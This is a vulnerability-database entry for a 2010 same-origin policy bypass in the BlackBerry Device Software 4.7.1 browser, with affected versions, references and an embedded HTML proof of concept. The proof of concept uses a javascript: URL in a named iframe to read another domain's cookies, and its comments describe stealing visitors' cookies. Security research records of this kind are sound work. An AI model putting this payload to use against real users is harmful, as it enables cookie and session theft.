ID
VAR-E-201010-0393
EDB ID
34802
TITLE
Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure.. remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.7.1 | Trust: 1.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | lte | version: | <=4.7.1 | Trust: 0.6 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.7.1.57 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.7.179 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.7 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.6.1.309 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.6.1 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.6.303 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.6 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.5.173 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.5 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.0.2 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.0.1.83 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.0.1.108 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry device software | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry | scope: | eq | version: | 88004.2 | Trust: 0.3 |
| vendor: | research | model: | in motion blackberry | scope: | eq | version: | 9700 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/43685/info
Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy.
An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks.
# [+] BlackBerry Browser Cross Origin Bypass
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# The Cross Origin Bypass is a way to bypass the domain's restrictions, you can execute javascript throught your domain on other domain, so you can get visitor's cookie throught your website.
#
# [+] PoC :
#
# Create a file.htm, save it with this code below and upload it on your server.
#
# <!--
# BlackBerry Cross Origin Bypass<br>
# Found by 599eme Man<br>
# flouf@live.fr<br>
# Test On google<br>
# -->
# <a href="javascript:window.open('javascript:alert(document.cookie)','blackb');">Test me</a><br>
# <iframe name="blackb" src="http://www.example.com"> </iframe>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross Domain Information Disclosure
Trust: 1.0
CREDITS
599eme Man
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 34802 | Trust: 1.9 |
| db: | BID | id: | 43685 | Trust: 1.9 |
| db: | EDBNET | id: | 56078 | Trust: 0.6 |
REFERENCES
| url: | https://www.securityfocus.com/bid/43685/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/34802/ | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/34802 | Trust: 0.3 |
| url: | http://www.rim.net/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 43685 |
| db: | EXPLOIT-DB | id: | 34802 |
| db: | EDBNET | id: | 56078 |
LAST UPDATE DATE
2022-07-27T09:50:13.572000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 43685 | date: | 2010-10-04T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 43685 | date: | 2010-10-04T00:00:00 |
| db: | EXPLOIT-DB | id: | 34802 | date: | 2010-10-04T00:00:00 |
| db: | EDBNET | id: | 56078 | date: | 2010-10-04T00:00:00 |